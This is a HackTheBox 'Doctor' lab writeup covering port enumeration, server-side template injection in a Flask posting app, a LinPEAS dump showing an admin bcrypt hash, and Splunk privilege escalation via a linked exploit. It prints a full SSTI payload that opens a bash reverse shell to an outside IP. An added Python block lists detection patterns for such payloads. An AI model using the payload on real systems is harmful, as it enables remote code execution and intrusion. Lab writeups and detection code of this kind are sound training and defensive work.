HTB Doctor

Writeup for Doctor box on HackTheBox.eu

Initial enumeration

Found ports 22, 80 and 8089 open on the box.

While browsing the IP we discover the hostname doctors.htb. After adding this host entry and accessing the page we find a new portal:

After registering an account we discover we can post messages. Inspecting the source code of the page we also find an /archive page which seems to be under development; however, if we post a new message, the title of the message appears in the XML feed.

Since this is a Python application, it's worth checking for SSTI (server-side template injection).

The first payload we can try is a simple {{ 4 * 4 }}, which will output 16 in the title if the injection works. This works as expected, and we can proceed to a more complex payload:

title={{ get_flashed_messages.__globals__.__builtins__.open("/var/tmp/cccc2.cfg", "w").write("from subprocess import check_output\n\nRUNCMD = check_output\n") }}{{ config.from_pyfile("/var/tmp/cccc2.cfg") }}{{ config["RUNCMD"]("/bin/bash -c '/bin/bash -i >%26 /dev/tcp/10.10.14.38/8443 0>%261'",shell=True) }}&content=a&submit=Post
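As an added, defender-side example (not part of the original writeup), the check below scans user-supplied fields such as the post title for the Jinja2 indicators this writeup relies on, so the app or a log hook can flag such requests; the sample post rows are constructed for this example.

```python
"""Flag Jinja2-style SSTI probes in user-supplied fields (added example).

Root cause in Flask apps of this kind is rendering user input as the
template itself, e.g. render_template_string(title); the fix is to pass
it as a variable, render_template_string("{{ t }}", t=title), so the
engine escapes it instead of evaluating it. This check is a second layer.
"""
import re
from typing import List, Tuple

# Indicators drawn from the probe and payload shapes used above.
INDICATORS = [
    ("jinja_expression", re.compile(r"\{\{.*?\}\}", re.S)),   # {{ 4 * 4 }} style probe
    ("jinja_statement", re.compile(r"\{%.*?%\}", re.S)),      # {% ... %} blocks
    ("dunder_access", re.compile(r"__(globals|builtins|class|subclasses|import)__")),
    ("config_loader", re.compile(r"config\.from_pyfile|config\[")),
    ("subprocess_call", re.compile(r"check_output|subprocess")),
    ("shell_redirect", re.compile(r"/dev/tcp/|/bin/(ba)?sh")),
]


def ssti_indicators(value: str) -> List[str]:
    """Return the names of all indicators matching `value` (empty if clean)."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def audit_posts(posts: List[Tuple[int, str]]) -> List[Tuple[int, List[str]]]:
    """Given (post_id, title) rows, return the rows that look like SSTI probes."""
    findings = []
    for post_id, title in posts:
        hits = ssti_indicators(title)
        if hits:
            findings.append((post_id, hits))
    return findings


# Constructed sample rows resembling the application's post table.
SAMPLE_POSTS = [
    (1, "Opening hours over the holidays"),
    (2, "{{ 4 * 4 }}"),
    (3, "Visit {{ get_flashed_messages.__globals__ }} now"),
]

if __name__ == "__main__":
    for post_id, hits in audit_posts(SAMPLE_POSTS):
        print(f"post {post_id}: {', '.join(hits)}")
```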

User enumeration

We are the user web:

web@doctor:~$ id
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

Running LinPEAS:

 --> Found interesting column names in user (output limit 10)
CREATE TABLE user (
        id INTEGER NOT NULL, 
        username VARCHAR(20) NOT NULL, 
        email VARCHAR(120) NOT NULL, 
        image_file VARCHAR(20) NOT NULL, 
        password VARCHAR(60) NOT NULL, 
        PRIMARY KEY (id), 
        UNIQUE (username), 
        UNIQUE (email)
)
1, admin, [email protected], default.gif, $2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S

In /var/log/apache2 there is a backup file where we can see something strange:

The string from the backup works as shaun's password for sudo.

Privilege escalation

Splunkd app command execution exploit

Using the exploit from https://github.com/cnotin/SplunkWhisperer2/blob/master/PySplunkWhisperer2/PySplunkWhisperer2_remote.py.